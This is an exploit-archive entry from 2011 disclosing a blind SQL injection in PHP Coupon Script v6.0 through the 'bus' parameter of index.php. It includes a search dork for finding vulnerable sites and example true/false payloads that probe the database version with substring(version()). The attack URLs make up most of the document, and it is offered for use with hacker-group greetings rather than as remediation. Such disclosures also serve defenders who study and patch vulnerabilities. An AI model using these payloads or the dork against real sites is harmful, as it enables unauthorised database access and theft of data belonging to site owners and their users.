id: 15324
date: 01/24/2011
title: PHP Coupon Script v. 6.0 (bus) Blind SQL Injection Vulnerability
author: BorN To K!LL
cves: 

==
[|]Script: PHP Coupon Script
[|]Version: 6.0
[|]Dork: "PHP Coupon Script v. 6.0"
[|]Link: http://www.couponscript.com
==
[|]Author: BorN To K!LL - h4ck3r
[|]Contact: SQL@hotmail.co.uk
==
[|]3xploit:
/index.php?page=viewbus&bus=[Blind-Injection]
 
[|]3xample:
/index.php?page=viewbus&bus=1 and substring(version(),1,1)=4                       // false ,,
/index.php?page=viewbus&bus=1 and substring(version(),1,1)=5                       // true ,,
 
==
[|]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==



#  0day.today [2023-03-24]  #